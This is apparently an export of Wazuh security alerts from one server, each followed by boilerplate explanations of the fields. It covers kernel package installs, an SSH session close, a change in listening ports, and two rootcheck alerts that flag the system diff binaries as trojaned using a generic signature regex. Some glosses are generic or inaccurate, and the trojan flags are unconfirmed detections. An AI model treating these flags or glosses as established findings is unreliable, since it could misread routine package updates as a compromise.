Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533410.28295
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:30 status half-configured linux-tools-6.8.0-58:amd64 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-tools-6.8.0-58
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-58.60
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) installed.

🧠 What happened? New dpkg (Debian Package) installed.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:30.329+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:30.329+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) installed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2902
Numeric ID of the detection rule that fired.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533410.28794
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:30 status installed linux-tools-6.8.0-58:amd64 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status installed
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-tools-6.8.0-58
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-58.60
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:30.329+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:30.329+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  14
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533410.29279
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:30 status half-configured linux-image-6.8.0-58-generic:amd64 6.8.0-58.60+1
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-image-6.8.0-58-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-58.60+1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

PAM: Login session closed.

🧠 What happened? PAM: Login session closed.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:23:38.296+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:38.296+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  PAM: Login session closed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5502
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['pam', 'syslog']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['7.8', '7.9']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AC.7']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533418.29798
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:23:38.270570+00:00 server1 sshd[71763]: pam_unix(sshd:session): session closed for user simba
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  sshd
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:23:38.270570+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  pam
Parent decoder used – for nested parsing.

decoder.name:  pam
Name of the Wazuh decoder that parsed this raw log.

data.dstuser:  simba
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) installed.

🧠 What happened? New dpkg (Debian Package) installed.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:38.296+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:38.296+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) installed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2902
Numeric ID of the detection rule that fired.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533418.30190
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:37 status installed linux-image-6.8.0-58-generic:amd64 6.8.0-58.60+1
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status installed
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-image-6.8.0-58-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-58.60+1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:38.296+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:38.296+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  15
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533418.30695
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:37 status half-configured linux-tools-6.8.0-58-generic:amd64 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-tools-6.8.0-58-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-58.60
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) installed.

🧠 What happened? New dpkg (Debian Package) installed.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:38.296+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:38.296+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) installed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2902
Numeric ID of the detection rule that fired.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533418.31210
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:37 status installed linux-tools-6.8.0-58-generic:amd64 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status installed
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-tools-6.8.0-58-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-58.60
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:38.296+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:38.296+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  16
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533418.31711
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:37 status half-configured linux-modules-extra-6.8.0-58-generic:amd64 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-modules-extra-6.8.0-58-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-58.60
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Host-based anomaly detection event (rootcheck).

🧠 What happened? Host-based anomaly detection event (rootcheck).

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:29:41.101+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:29:41.101+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Host-based anomaly detection event (rootcheck).
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  510
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['ossec', 'rootcheck']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533781.32242
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  Trojaned version of file '/bin/diff' detected. Signature used: 'bash|^/bin/sh|file\.h|proc\.h|/dev/[^n]|^/bin/.*sh' (Generic).
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  rootcheck
Name of the Wazuh decoder that parsed this raw log.

data.title:  Trojaned version of file detected.
Short title some decoders add – usually informational.

data.file:  /bin/diff
Generic file path referenced in the log.

location:  rootcheck
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Host-based anomaly detection event (rootcheck).

🧠 What happened? Host-based anomaly detection event (rootcheck).

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:29:41.132+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:29:41.132+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Host-based anomaly detection event (rootcheck).
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  510
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['ossec', 'rootcheck']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533781.32617
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  Trojaned version of file '/usr/bin/diff' detected. Signature used: 'bash|^/bin/sh|file\.h|proc\.h|/dev/[^n]|^/bin/.*sh' (Generic).
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  rootcheck
Name of the Wazuh decoder that parsed this raw log.

data.title:  Trojaned version of file detected.
Short title some decoders add – usually informational.

data.file:  /usr/bin/diff
Generic file path referenced in the log.

location:  rootcheck
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Listened ports status (netstat) changed (new port opened or closed).

🧠 What happened? Listened ports status (netstat) changed (new port opened or closed).

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:29:43.646+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:29:43.646+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Listened ports status (netstat) changed (new port opened or closed).
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  533
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['ossec']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['10.1']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533783.33000
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

previous_output:  Previous output: ossec: output: 'netstat listening ports': tcp6 :::22 :::* 1/systemd tcp 127.0.0.53:53 0.0.0.0:* 4398/systemd-resolv tcp 127.0.0.54:53 0.0.0.0:* 4398/systemd-resolv udp 127.0.0.53:53 0.0.0.0:* 4398/systemd-resolv udp 127.0.0.54:53 0.0.0.0:* 4398/systemd-resolv udp 192.168.6.137:68 0.0.0.0:* 4024/systemd-networ tcp 0.0.0.0:443 0.0.0.0:* 62808/node tcp 0.0.0.0:1514 0.0.0.0:* 60647/wazuh-remoted tcp 0.0.0.0:1515 0.0.0.0:* 60521/wazuh-authd tcp6 127.0.0.1:9200 :::* 16883/java tcp6 127.0.0.1:9300 :::* 16883/java tcp 0.0.0.0:55000 0.0.0.0:* 60481/python3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

full_log:  ossec: output: 'netstat listening ports': tcp6 :::22 :::* 1/init tcp 127.0.0.53:53 0.0.0.0:* 729/systemd-resolve tcp 127.0.0.54:53 0.0.0.0:* 729/systemd-resolve udp 127.0.0.53:53 0.0.0.0:* 729/systemd-resolve udp 127.0.0.54:53 0.0.0.0:* 729/systemd-resolve udp 192.168.6.137:68 0.0.0.0:* 710/systemd-network tcp 0.0.0.0:443 0.0.0.0:* 908/node tcp 0.0.0.0:1514 0.0.0.0:* 1711/wazuh-remoted tcp 0.0.0.0:1515 0.0.0.0:* 1626/wazuh-authd tcp 0.0.0.0:55000 0.0.0.0:* 1578/python3
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  ossec
Name of the Wazuh decoder that parsed this raw log.

previous_log:  ossec: output: 'netstat listening ports': tcp6 :::22 :::* 1/systemd tcp 127.0.0.53:53 0.0.0.0:* 4398/systemd-resolv tcp 127.0.0.54:53 0.0.0.0:* 4398/systemd-resolv udp 127.0.0.53:53 0.0.0.0:* 4398/systemd-resolv udp 127.0.0.54:53 0.0.0.0:* 4398/systemd-resolv udp 192.168.6.137:68 0.0.0.0:* 4024/systemd-networ tcp 0.0.0.0:443 0.0.0.0:* 62808/node tcp 0.0.0.0:1514 0.0.0.0:* 60647/wazuh-remoted tcp 0.0.0.0:1515 0.0.0.0:* 60521/wazuh-authd tcp6 127.0.0.1:9200 :::* 16883/java tcp6 127.0.0.1:9300 :::* 16883/java tcp 0.0.0.0:55000 0.0.0.0:* 60481/python3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  netstat listening ports
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

PAM misconfiguration.

🧠 What happened? PAM misconfiguration.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:29:45.510+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low
